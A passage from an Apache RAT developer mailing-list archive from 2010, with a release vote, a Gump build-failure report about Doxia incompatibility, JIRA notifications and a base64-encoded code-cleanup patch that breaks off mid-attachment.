localhost (v35516.1blu.de [161.129.204.104]) (amavisd-new, port 10024) with ESMTP id 9Pl08QdBthtQ for <[email protected]>; Sun, 1 Aug 2010 08:04:17 +0200 (CEST) Received: by samaflost.de (Postfix, from userid 1000) id BF43B28985D2; Sun, 1 Aug 2010 08:04:17 +0200 (CEST) From: Stefan Bodewig <[email protected]> To: [email protected] Subject: Re: VOTE: Release Apache RAT 0.7 rc3 References: <[email protected]> X-Draft-From: ("nnfolder:mail.rat" 999) Date: Sun, 01 Aug 2010 08:04:17 +0200 In-Reply-To: <[email protected]> (Jochen Wiedmann's message of "Fri, 30 Jul 2010 23:22:42 +0200") Message-ID: <[email protected]> User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/23.2 (gnu/linux) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii On 2010-07-30, Jochen Wiedmann wrote: > I'd like to ask for a release of Apache RAT 0.7 rc4. > The distribution files (binary and source) are here: > https://repository.apache.org/content/repositories/orgapacherat-051/org/apache/rat/apache-rat/0.7/ > The proposed site and the KEYS file are here: > http://people.apache.org/~jochen/rat/site/ > http://people.apache.org/~jochen/rat/KEYS > The SVN tag: > https://svn.apache.org/repos/asf/incubator/rat/main/tags/apache-rat-project-0.7/ > Please, cast your vote. > [X] +1 > [ ] =0 > [ ] -1 +1 Stefan From [email protected] Sun Aug 01 18:16:53 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 61594 invoked from network); 1 Aug 2010 18:16:52 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 1 Aug 2010 18:16:52 -0000 Received: (qmail 79324 invoked by uid 500); 1 Aug 2010 18:16:52 -0000 Delivered-To: [email protected] Received: (qmail 79269 invoked by uid 500); 1 Aug 2010 18:16:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 79261 invoked by uid 99); 1 Aug 2010 18:16:52 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 01 Aug 2010 18:16:52 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FREEMAIL_FROM,RCVD_IN_DNSWL_NONE,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-pz0-f47.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 01 Aug 2010 18:16:45 +0000 Received: by pzk2 with SMTP id 2so1164647pzk.6 for <[email protected]>; Sun, 01 Aug 2010 11:16:25 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:in-reply-to :references:date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=LeCO0lgvESO6s3MhAF7P1BQbrTORFSObu31dYu4m1Q4=; b=K7d+jZCArh9OvABDK12qtL02fDcZmJ7YAN6kG4LgcJh1B8zaY/KMHxM7VmTu3x/m/p +6XQuGoasXuekEEXvlT1goaSnDu5mR+RbZRpF13g5G3Fprv+HrowsOONCrDsUJmGkyWm B1NQ8jW6h0j7laJUazzWm8Cqz/bb+7ZrzDYkU= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=bppJPGQnL5US0I4npW3W3CEVhP9YfY88gbURosu4R8gPyj0E64F5Yh8PIpR2Pg/Gs+ uAV0L5uoyGQC24mYUBbqXR2dXkB6aH3JJV/nWiRGsdS8PisBBXqPF/iFl1SCqX/Spj5U gBIoTmLMtEs2hpS0VP5gBJtj6cF8yX8aJ2B4w= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id m14mr4404640wfe.148.1280686585729; Sun, 01 Aug 2010 11:16:25 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Sun, 1 Aug 2010 11:16:25 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> Date: Sun, 1 Aug 2010 20:16:25 +0200 Message-ID: <[email protected]> Subject: Re: VOTE: Release Apache RAT 0.7 rc3 From: Jochen Wiedmann <[email protected]> To: [email protected] Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable Reminder: We need 3 votes. On Sun, Aug 1, 2010 at 8:04 AM, Stefan Bodewig <[email protected]> wrote: > On 2010-07-30, Jochen Wiedmann wrote: > >> I'd like to ask for a release of Apache RAT 0.7 rc4. > >> The distribution files (binary and source) are here: > >> =C2=A0 https://repository.apache.org/content/repositories/orgapacherat-0= 51/org/apache/rat/apache-rat/0.7/ > >> The proposed site and the KEYS file are here: > >> =C2=A0 http://people.apache.org/~jochen/rat/site/ >> =C2=A0 http://people.apache.org/~jochen/rat/KEYS > >> The SVN tag: > >> =C2=A0 https://svn.apache.org/repos/asf/incubator/rat/main/tags/apache-r= at-project-0.7/ > >> Please, cast your vote. > >> [X] +1 >> [ ] =3D0 >> [ ] -1 > > +1 > > Stefan > --=20 Germanys national anthem is the most boring in the world - how telling! From [email protected] Mon Aug 02 09:18:46 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 40130 invoked from network); 2 Aug 2010 09:18:46 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 2 Aug 2010 09:18:46 -0000 Received: (qmail 46421 invoked by uid 500); 2 Aug 2010 09:18:46 -0000 Delivered-To: [email protected] Received: (qmail 46370 invoked by uid 500); 2 Aug 2010 09:18:45 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 46358 invoked by uid 99); 2 Aug 2010 09:18:44 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 02 Aug 2010 09:18:44 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=RCVD_IN_DNSWL_NONE,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO nschwmtas01p.mx.bigpond.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 02 Aug 2010 09:18:36 +0000 Received: from nschwotgx01p.mx.bigpond.com ([161.129.204.104]) by nschwmtas01p.mx.bigpond.com with ESMTP id <[email protected]> for <[email protected]>; Mon, 2 Aug 2010 09:18:14 +0000 Received: from deltaflyer ([161.129.204.104]) by nschwotgx01p.mx.bigpond.com with ESMTP id <20100802091813.CPYW8424.nschwotgx01p.mx.bigpond.com@deltaflyer> for <[email protected]>; Mon, 2 Aug 2010 09:18:13 +0000 From: "Gav..." <[email protected]> To: <[email protected]> References: <[email protected]> In-Reply-To: <[email protected]> Subject: RE: VOTE: Release Apache RAT 0.7 rc3 Date: Mon, 2 Aug 2010 19:18:20 +1000 Message-ID: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset="UTF-8" Content-Transfer-Encoding: 7bit X-Mailer: Microsoft Office Outlook 12.0 Thread-Index: AcswLWjLXMNPU9tvTV+fZRFn1wrwIAB9ig6g Content-Language: en-au X-RPD-ScanID: Class unknown; VirusThreatLevel unknown, RefID str=0001.0A090207.4C568D55.0229,ss=1,fgs=0 X-SIH-MSG-ID: rBE3GdzuC1GynToniDG6b1YolgmU8yh8ocBMD8039kcITUTHp8DWRdSicKZfwInjxEMTaAr0ezYwc670XYbbs9G6ILhBWLDY58I= > -----Original Message----- > From: Jochen Wiedmann [mailto:[email protected]] > Sent: Saturday, 31 July 2010 7:23 AM > To: [email protected] > Subject: VOTE: Release Apache RAT 0.7 rc3 > > Hi, > > I'd like to ask for a release of Apache RAT 0.7 rc4. > > The distribution files (binary and source) are here: > > https://repository.apache.org/content/repositories/orgapacherat- > 051/org/apache/rat/apache-rat/0.7/ > > The proposed site and the KEYS file are here: > > http://people.apache.org/~jochen/rat/site/ > http://people.apache.org/~jochen/rat/KEYS > > The SVN tag: > > https://svn.apache.org/repos/asf/incubator/rat/main/tags/apache-rat- > project-0.7/ > > The list of resolved issues is here: > > > https://issues.apache.org/jira/secure/IssueNavigator.jspa?reset=true&&p > id=12310750&status=5&status=6&fixfor=12313890&sorter/field=issuekey&sor > ter/order=DESC > > Compared to RC3, the following changes have been made (my thanks to > Stefan for doing this work): > > - AL header added to download page. > - AL header added to src/test/resources/javadocs/notjavadoc.html > - Added missing EOL properties > > > Please, cast your vote. > > [X] +1 Looks good, Built and tested, nice work peeps. Gav... > [ ] =0 > [ ] -1 > > Thanks, > > Jochen From [email protected] Wed Aug 04 13:25:01 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 5400 invoked from network); 4 Aug 2010 13:25:01 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 4 Aug 2010 13:25:01 -0000 Received: (qmail 27387 invoked by uid 500); 4 Aug 2010 13:25:00 -0000 Delivered-To: [email protected] Received: (qmail 27321 invoked by uid 500); 4 Aug 2010 13:24:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 27268 invoked by uid 99); 4 Aug 2010 13:24:57 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 04 Aug 2010 13:24:57 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO vmgump.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 04 Aug 2010 13:24:57 +0000 Received: from [161.129.204.104] (localhost [161.129.204.104]) by vmgump.apache.org (Postfix) with ESMTP id D9098AB4532 for <[email protected]>; Wed, 4 Aug 2010 06:24:36 -0700 (PDT) Date: Wed, 04 Aug 2010 06:24:36 PDT From: [email protected] To: [email protected] Subject: [GUMP@vmgump]: Project rat (in module rat) failed Message-Id: <[email protected]> To whom it may engage... This is an automated request, but not an unsolicited one. For more information please visit http://gump.apache.org/nagged.html, and/or contact the folk at [email protected]. Project rat has an issue affecting its community integration. This issue affects 4 projects, and has been outstanding for 349 runs. The current state of this project is 'Failed', with reason 'Build Failed'. For reference only, the following projects are affected by this: - forrest-rat : Apache Forrest software is a publishing framework that trans... - rat : Release Audit Tool - rat-tasks-antunit-tests : Release Audit Tool - rat-test : Release Audit Tool Full details are available at: http://vmgump.apache.org/gump/public/rat/rat/index.html That said, some information snippets are provided here. The following annotations (debug/informational/warning/error messages) were provided: -INFO- Optional dependency ws-commons-axiom failed with reason build failed -DEBUG- (Gump generated) Maven2 Settings in: /srv/gump/public/workspace/rat/gump_mvn_settings.xml -INFO- Failed with reason build failed -DEBUG- Maven POM in: /srv/gump/public/workspace/rat/pom.xml -DEBUG- Extracted fallback artifacts from Gump Repository The following work was performed: http://vmgump.apache.org/gump/public/rat/rat/gump_work/build_rat_rat.html Work Name: build_rat_rat (Type: Build) Work ended in a state of : Failed Elapsed: 16 secs Command Line: mvn --batch-mode -Dmaven.test.skip.exec=true --settings /srv/gump/public/workspace/rat/gump_mvn_settings.xml package [Working Directory: /srv/gump/public/workspace/rat] --------------------------------------------- [ERROR] /srv/gump/public/workspace/rat/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[215,12] cannot find symbol symbol : class RenderingContext location: class org.apache.rat.mp.RatReportMojo [ERROR] /srv/gump/public/workspace/rat/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[215,43] cannot find symbol symbol : class RenderingContext location: class org.apache.rat.mp.RatReportMojo [ERROR] /srv/gump/public/workspace/rat/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[217,36] cannot access org.apache.maven.doxia.module.xhtml.XhtmlSink class file for org.apache.maven.doxia.module.xhtml.XhtmlSink not found SiteRendererSink sink = new SiteRendererSink( context ); [ERROR] /srv/gump/public/workspace/rat/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[285,12] cannot access org.apache.maven.doxia.logging.LogEnabled class file for org.apache.maven.doxia.logging.LogEnabled not found sink.head(); [INFO] 5 errors [INFO] ------------------------------------------------------------- [INFO] ------------------------------------------------------------------------ [ERROR] BUILD FAILURE [INFO] ------------------------------------------------------------------------ [INFO] Compilation failure /srv/gump/public/workspace/rat/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[42,60] package org.apache.maven.doxia.module.xhtml.decoration.render does not exist /srv/gump/public/workspace/rat/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[215,12] cannot find symbol symbol : class RenderingContext location: class org.apache.rat.mp.RatReportMojo /srv/gump/public/workspace/rat/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[215,43] cannot find symbol symbol : class RenderingContext location: class org.apache.rat.mp.RatReportMojo /srv/gump/public/workspace/rat/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[217,36] cannot access org.apache.maven.doxia.module.xhtml.XhtmlSink class file for org.apache.maven.doxia.module.xhtml.XhtmlSink not found SiteRendererSink sink = new SiteRendererSink( context ); /srv/gump/public/workspace/rat/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[285,12] cannot access org.apache.maven.doxia.logging.LogEnabled class file for org.apache.maven.doxia.logging.LogEnabled not found sink.head(); [INFO] ------------------------------------------------------------------------ [INFO] For more information, run Maven with the -e switch [INFO] ------------------------------------------------------------------------ [INFO] Total time: 15 seconds [INFO] Finished at: Wed Aug 04 06:24:35 PDT 2010 [INFO] Final Memory: 31M/74M [INFO] ------------------------------------------------------------------------ --------------------------------------------- To subscribe to this information via syndicated feeds: - RSS: http://vmgump.apache.org/gump/public/rat/rat/rss.xml - Atom: http://vmgump.apache.org/gump/public/rat/rat/atom.xml ============================== Gump Tracking Only === Produced by Gump version 2.3. Gump Run 08000004082010, vmgump:vmgump-public:08000004082010 Gump E-mail Identifier (unique within run) #64. -- Apache Gump http://gump.apache.org/ [Instance: vmgump] From [email protected] Wed Aug 04 14:26:24 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 34195 invoked from network); 4 Aug 2010 14:26:24 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 4 Aug 2010 14:26:24 -0000 Received: (qmail 49693 invoked by uid 500); 4 Aug 2010 14:26:24 -0000 Delivered-To: [email protected] Received: (qmail 49641 invoked by uid 500); 4 Aug 2010 14:26:23 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 49633 invoked by uid 99); 4 Aug 2010 14:26:23 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 04 Aug 2010 14:26:22 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO samaflost.de) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 04 Aug 2010 14:26:15 +0000 Received: from localhost (localhost.localdomain [161.129.204.104]) by samaflost.de (Postfix) with ESMTP id A1B2140E000A for <[email protected]>; Wed, 4 Aug 2010 16:25:53 +0200 (CEST) Received: from samaflost.de ([161.129.204.104]) by localhost (v35516.1blu.de [161.129.204.104]) (amavisd-new, port 10024) with ESMTP id jKuyT7eJ6-gz for <[email protected]>; Wed, 4 Aug 2010 16:25:53 +0200 (CEST) Received: by samaflost.de (Postfix, from userid 1000) id 4A11340E0009; Wed, 4 Aug 2010 16:25:53 +0200 (CEST) From: Stefan Bodewig <[email protected]> To: [email protected] Subject: Re: [GUMP@vmgump]: Project rat (in module rat) failed References: <[email protected]> X-Draft-From: ("nnfolder:mail.rat" 1008) Date: Wed, 04 Aug 2010 16:25:52 +0200 In-Reply-To: <[email protected]> ([email protected]'s message of "Wed, 04 Aug 2010 06:24:36 PDT") Message-ID: <[email protected]> User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/23.2 (gnu/linux) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Virus-Checked: Checked by ClamAV on apache.org this started to happen when I added doxia to Gump - so RAT's Maven plugin is incompatible with doxia's trunk (or rather the other way around), it seems. see also https://issues.apache.org/jira/browse/RAT-78 Do we want to follow Doxia? It seems too late to lobby for backwards compatibility. Stefan On 2010-08-04, <[email protected]> wrote: > /srv/gump/public/workspace/rat/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[42,60] package org.apache.maven.doxia.module.xhtml.decoration.render does not exist > /srv/gump/public/workspace/rat/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[215,12] cannot find symbol > symbol : class RenderingContext > location: class org.apache.rat.mp.RatReportMojo > /srv/gump/public/workspace/rat/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[215,43] cannot find symbol > symbol : class RenderingContext > location: class org.apache.rat.mp.RatReportMojo > /srv/gump/public/workspace/rat/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[217,36] cannot access org.apache.maven.doxia.module.xhtml.XhtmlSink > class file for org.apache.maven.doxia.module.xhtml.XhtmlSink not found > SiteRendererSink sink = new SiteRendererSink( context ); > /srv/gump/public/workspace/rat/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[285,12] cannot access org.apache.maven.doxia.logging.LogEnabled > class file for org.apache.maven.doxia.logging.LogEnabled not found > sink.head(); Stefan From [email protected] Wed Aug 04 14:29:39 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 35772 invoked from network); 4 Aug 2010 14:29:38 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 4 Aug 2010 14:29:38 -0000 Received: (qmail 54249 invoked by uid 500); 4 Aug 2010 14:29:38 -0000 Delivered-To: [email protected] Received: (qmail 54186 invoked by uid 500); 4 Aug 2010 14:29:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 54176 invoked by uid 99); 4 Aug 2010 14:29:37 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 04 Aug 2010 14:29:37 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 04 Aug 2010 14:29:37 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o74ETG27028905 for <[email protected]>; Wed, 4 Aug 2010 14:29:16 GMT Message-ID: <16655523.157971280932156710.JavaMail.jira@thor> Date: Wed, 4 Aug 2010 10:29:16 -0400 (EDT) From: "Stefan Bodewig (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (RAT-78) Support doxia 1.1.2 In-Reply-To: <23621015.360411279057909825.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 [ https://issues.apache.org/jira/browse/RAT-78?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Stefan Bodewig updated RAT-78: ------------------------------ Component/s: maven > Support doxia 1.1.2 > ------------------- > > Key: RAT-78 > URL: https://issues.apache.org/jira/browse/RAT-78 > Project: RAT > Issue Type: New Feature > Components: maven > Affects Versions: 0.7 > Environment: Fedora Rawhide > maven-doxia 1.1.2 > Reporter: Orion Poplawski > > Trying to package up apache-rat for Fedora. Fails to build from source with: > [INFO] Compilation failure > /builddir/build/BUILD/apache-rat-0.8-20100713/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[42,60] package org.apache.maven.doxia.module.xhtml.decoration.render does not exist > /builddir/build/BUILD/apache-rat-0.8-20100713/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[215,12] cannot find symbol > symbol : class RenderingContext > location: class org.apache.rat.mp.RatReportMojo > /builddir/build/BUILD/apache-rat-0.8-20100713/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[215,43] cannot find symbol > symbol : class RenderingContext > location: class org.apache.rat.mp.RatReportMojo -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Wed Aug 04 14:42:39 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 40414 invoked from network); 4 Aug 2010 14:42:38 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 4 Aug 2010 14:42:38 -0000 Received: (qmail 88119 invoked by uid 500); 4 Aug 2010 14:42:38 -0000 Delivered-To: [email protected] Received: (qmail 88077 invoked by uid 500); 4 Aug 2010 14:42:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 88064 invoked by uid 99); 4 Aug 2010 14:42:37 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 04 Aug 2010 14:42:37 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 04 Aug 2010 14:42:37 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o74EgGgE029013 for <[email protected]>; Wed, 4 Aug 2010 14:42:16 GMT Message-ID: <16363159.158091280932936593.JavaMail.jira@thor> Date: Wed, 4 Aug 2010 10:42:16 -0400 (EDT) From: "Orion Poplawski (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (RAT-78) Support doxia 1.1.2 In-Reply-To: <23621015.360411279057909825.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 [ https://issues.apache.org/jira/browse/RAT-78?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12895274#action_12895274 ] Orion Poplawski commented on RAT-78: ------------------------------------ I am on vacation and will be out of the office until Monday, August 9th. Your message has been saved and I will respond if needed when I return. If this is an urgent CoRA computing issue, please contact Bob Stockwell. Cheers, Orion -- Orion Poplawski Technical Manager 5047774238 NWRA/CoRA Division FAX: 5047774238 3380 Mitchell Lane [email protected] Boulder, CO 80301 http://www.cora.nwra.com > Support doxia 1.1.2 > ------------------- > > Key: RAT-78 > URL: https://issues.apache.org/jira/browse/RAT-78 > Project: RAT > Issue Type: New Feature > Components: maven > Affects Versions: 0.7 > Environment: Fedora Rawhide > maven-doxia 1.1.2 > Reporter: Orion Poplawski > > Trying to package up apache-rat for Fedora. Fails to build from source with: > [INFO] Compilation failure > /builddir/build/BUILD/apache-rat-0.8-20100713/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[42,60] package org.apache.maven.doxia.module.xhtml.decoration.render does not exist > /builddir/build/BUILD/apache-rat-0.8-20100713/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[215,12] cannot find symbol > symbol : class RenderingContext > location: class org.apache.rat.mp.RatReportMojo > /builddir/build/BUILD/apache-rat-0.8-20100713/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[215,43] cannot find symbol > symbol : class RenderingContext > location: class org.apache.rat.mp.RatReportMojo -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Wed Aug 04 15:15:02 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 56267 invoked from network); 4 Aug 2010 15:15:02 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 4 Aug 2010 15:15:02 -0000 Received: (qmail 35604 invoked by uid 500); 4 Aug 2010 15:15:02 -0000 Delivered-To: [email protected] Received: (qmail 35549 invoked by uid 500); 4 Aug 2010 15:15:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 35540 invoked by uid 99); 4 Aug 2010 15:15:01 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 04 Aug 2010 15:15:01 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=RCVD_IN_DNSWL_NONE,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO mail-qy0-f175.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 04 Aug 2010 15:14:54 +0000 Received: by qyk11 with SMTP id 11so2069584qyk.6 for <[email protected]>; Wed, 04 Aug 2010 08:14:30 -0700 (PDT) MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id w19mr3981992qae.174.1280934870555; Wed, 04 Aug 2010 08:14:30 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Wed, 4 Aug 2010 08:14:30 -0700 (PDT) X-Originating-IP: [161.129.204.104] Date: Wed, 4 Aug 2010 10:14:30 -0500 Message-ID: <[email protected]> Subject: [PATCH] From: Hyrum Wright <[email protected]> To: rat-dev <[email protected]> Content-Type: multipart/mixed; boundary=00c09f93d928f09dd3048d00e3dd --00c09f93d928f09dd3048d00e3dd Content-Type: text/plain; charset=ISO-8859-1 In going through the codebase, I noticed a few areas among the guessers that seemed a little verbose. The attached patch cleans them up a bit. Also, I'm a bit curious why we still require a source version of Java 1.4. Best, -Hyrum --00c09f93d928f09dd3048d00e3dd Content-Type: text/plain; charset=US-ASCII; name="guesser_cleanups.patch.txt" Content-Disposition: attachment; filename="guesser_cleanups.patch.txt" Content-Transfer-Encoding: base64 X-Attachment-Id: f_gcgbiiiu0 SW5kZXg6IGFwYWNoZS1yYXQtY29yZS9zcmMvbWFpbi9qYXZhL29yZy9hcGFjaGUvcmF0L2RvY3Vt ZW50L2ltcGwvZ3Vlc3Nlci9BcmNoaXZlR3Vlc3Nlci5qYXZhCj09PT09PT09PT09PT09PT09PT09 PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0KLS0tIGFwYWNo ZS1yYXQtY29yZS9zcmMvbWFpbi9qYXZhL29yZy9hcGFjaGUvcmF0L2RvY3VtZW50L2ltcGwvZ3Vl c3Nlci9BcmNoaXZlR3Vlc3Nlci5qYXZhCShyZXZpc2lvbiA5ODIyNzQpCisrKyBhcGFjaGUtcmF0 LWNvcmUvc3JjL21haW4vamF2YS9vcmcvYXBhY2hlL3JhdC9kb2N1bWVudC9pbXBsL2d1ZXNzZXIv QXJjaGl2ZUd1ZXNzZXIuamF2YQkod29ya2luZyBjb3B5KQpAQCAtMzIsMTAgKzMyLDcgQEAgcHVi bGljIGNsYXNzIEFyY2hpdmVHdWVzc2VyIHsKICAgICB9OwogCiAgICAgcHVibGljIHN0YXRpYyBm aW5hbCBib29sZWFuIGlzQXJjaGl2ZShmaW5hbCBEb2N1bWVudCBkb2N1bWVudCkgewotICAgICAg ICAKLSAgICAgICAgZmluYWwgU3RyaW5nIG5hbWUgPSBkb2N1bWVudC5nZXROYW1lKCk7Ci0gICAg ICAgIGZpbmFsIGJvb2xlYW4gcmVzdWx0ID0gaXNBcmNoaXZlKG5hbWUpOwotICAgICAgICByZXR1 cm4gcmVzdWx0OworICAgICAgICByZXR1cm4gaXNBcmNoaXZlKGRvY3VtZW50LmdldE5hbWUoKSk7 CiAgICAgfQogCiAgICAgLyoqCkBAIC00NCwxMSArNDEsMTEgQEAgcHVibGljIGNsYXNzIEFyY2hp dmVHdWVzc2VyIHsKICAgICBwdWJsaWMgc3RhdGljIGZpbmFsIGJvb2xlYW4gaXNBcmNoaXZlKGZp 